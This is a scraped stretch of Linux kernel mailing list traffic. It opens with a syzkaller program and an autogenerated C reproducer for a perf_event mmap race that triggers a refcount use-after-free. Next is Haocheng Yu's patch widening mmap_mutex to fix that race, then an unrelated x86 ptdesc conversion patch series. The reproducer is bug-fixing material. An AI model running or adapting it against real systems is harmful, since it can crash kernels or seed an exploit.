0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
From: Haocheng Yu <yuhaocheng035@gmail.com> Syzkaller reported a refcount_t: addition on 0; use-after-free warning in perf_mmap. The issue is caused by a race condition between a failing mmap() setup and a concurrent mmap() on a dependent event (e.g., using output redirection). In perf_mmap(), the ring_buffer (rb) is allocated and assigned to event->rb with the mmap_mutex held. The mutex is then released to perform map_range(). If map_range() fails, perf_mmap_close() is called to clean up. However, since the mutex was dropped, another thread attaching to this event (via inherited events or output redirection) can acquire the mutex, observe the valid event->rb pointer, and attempt to increment its reference count. If the cleanup path has already dropped the reference count to zero, this results in a use-after-free or refcount saturation warning. Fix this by extending the scope of mmap_mutex to cover the map_range() call. This ensures that the ring buffer initialization and mapping (or cleanup on failure) happens atomically effectively, preventing other threads from accessing a half-initialized or dying ring buffer. Reported-by: kernel test robot <lkp@intel.com> Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/ Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com> --- kernel/events/core.c | 38 +++++++++++++++++++------------------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..abefd1213582 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } base-commit: 7d0a66e4bb9081d75c82ec4957c50034cb0ea449 -- 2.51.0
{ "author": "yuhaocheng035@gmail.com", "date": "Tue, 3 Feb 2026 00:20:56 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH v3 0/3] Convert 64-bit x86/mm/pat to ptdescs
x86/mm/pat should be using ptdescs. One line has already been converted to pagetable_free(), while the allocation sites use get_free_pages(). This causes issues separately allocating ptdescs from struct page. These patches convert the allocation/free sites to use ptdescs. In the short term, this helps enable Matthew's work to allocate frozen pagetables[1]. And in the long term, this will help us cleanly split ptdesc allocations from struct page. The pgd_list should also be using ptdescs (for 32bit in this file). This can be done in a different patchset since there's other users of pgd_list that still need to be converted. [1] https://lore.kernel.org/linux-mm/20251113140448.1814860-1-willy@infradead.org/ [2] https://lore.kernel.org/linux-mm/20251020001652.2116669-1-willy@infradead.org/ ------ I've also tested this on a tree that separately allocates ptdescs. That didn't find any lingering alloc/free issues. Based on current mm-new. v3: - Move comment regarding 32-bit conversions into the cover letter - Correct the handling for the pagetable_alloc() error path Vishal Moola (Oracle) (3): x86/mm/pat: Convert pte code to use ptdescs x86/mm/pat: Convert pmd code to use ptdescs x86/mm/pat: Convert split_large_page() to use ptdescs arch/x86/mm/pat/set_memory.c | 56 +++++++++++++++++++++--------------- 1 file changed, 33 insertions(+), 23 deletions(-) -- 2.52.0
In order to separately allocate ptdescs from pages, we need all allocation and free sites to use the appropriate functions. Convert these pte allocation/free sites to use ptdescs. Signed-off-by: Vishal Moola (Oracle) <vishal.moola@gmail.com> --- arch/x86/mm/pat/set_memory.c | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c index 6c6eb486f7a6..f9f9d4ca8e71 100644 --- a/arch/x86/mm/pat/set_memory.c +++ b/arch/x86/mm/pat/set_memory.c @@ -1408,7 +1408,7 @@ static bool try_to_free_pte_page(pte_t *pte) if (!pte_none(pte[i])) return false; - free_page((unsigned long)pte); + pagetable_free(virt_to_ptdesc((void *)pte)); return true; } @@ -1537,12 +1537,15 @@ static void unmap_pud_range(p4d_t *p4d, unsigned long start, unsigned long end) */ } -static int alloc_pte_page(pmd_t *pmd) +static int alloc_pte_ptdesc(pmd_t *pmd) { - pte_t *pte = (pte_t *)get_zeroed_page(GFP_KERNEL); - if (!pte) + pte_t *pte; + struct ptdesc *ptdesc = pagetable_alloc(GFP_KERNEL | __GFP_ZERO, 0); + + if (!ptdesc) return -1; + pte = (pte_t *) ptdesc_address(ptdesc); set_pmd(pmd, __pmd(__pa(pte) | _KERNPG_TABLE)); return 0; } @@ -1600,7 +1603,7 @@ static long populate_pmd(struct cpa_data *cpa, */ pmd = pmd_offset(pud, start); if (pmd_none(*pmd)) - if (alloc_pte_page(pmd)) + if (alloc_pte_ptdesc(pmd)) return -1; populate_pte(cpa, start, pre_end, cur_pages, pmd, pgprot); @@ -1641,7 +1644,7 @@ static long populate_pmd(struct cpa_data *cpa, if (start < end) { pmd = pmd_offset(pud, start); if (pmd_none(*pmd)) - if (alloc_pte_page(pmd)) + if (alloc_pte_ptdesc(pmd)) return -1; populate_pte(cpa, start, end, num_pages - cur_pages, -- 2.52.0
{ "author": "\"Vishal Moola (Oracle)\" <vishal.moola@gmail.com>", "date": "Mon, 2 Feb 2026 09:20:03 -0800", "thread_id": "20260202172005.683870-1-vishal.moola@gmail.com.mbox.gz" }
lkml
[PATCH v3 0/3] Convert 64-bit x86/mm/pat to ptdescs
x86/mm/pat should be using ptdescs. One line has already been converted to pagetable_free(), while the allocation sites use get_free_pages(). This causes issues separately allocating ptdescs from struct page. These patches convert the allocation/free sites to use ptdescs. In the short term, this helps enable Matthew's work to allocate frozen pagetables[1]. And in the long term, this will help us cleanly split ptdesc allocations from struct page. The pgd_list should also be using ptdescs (for 32bit in this file). This can be done in a different patchset since there's other users of pgd_list that still need to be converted. [1] https://lore.kernel.org/linux-mm/20251113140448.1814860-1-willy@infradead.org/ [2] https://lore.kernel.org/linux-mm/20251020001652.2116669-1-willy@infradead.org/ ------ I've also tested this on a tree that separately allocates ptdescs. That didn't find any lingering alloc/free issues. Based on current mm-new. v3: - Move comment regarding 32-bit conversions into the cover letter - Correct the handling for the pagetable_alloc() error path Vishal Moola (Oracle) (3): x86/mm/pat: Convert pte code to use ptdescs x86/mm/pat: Convert pmd code to use ptdescs x86/mm/pat: Convert split_large_page() to use ptdescs arch/x86/mm/pat/set_memory.c | 56 +++++++++++++++++++++--------------- 1 file changed, 33 insertions(+), 23 deletions(-) -- 2.52.0
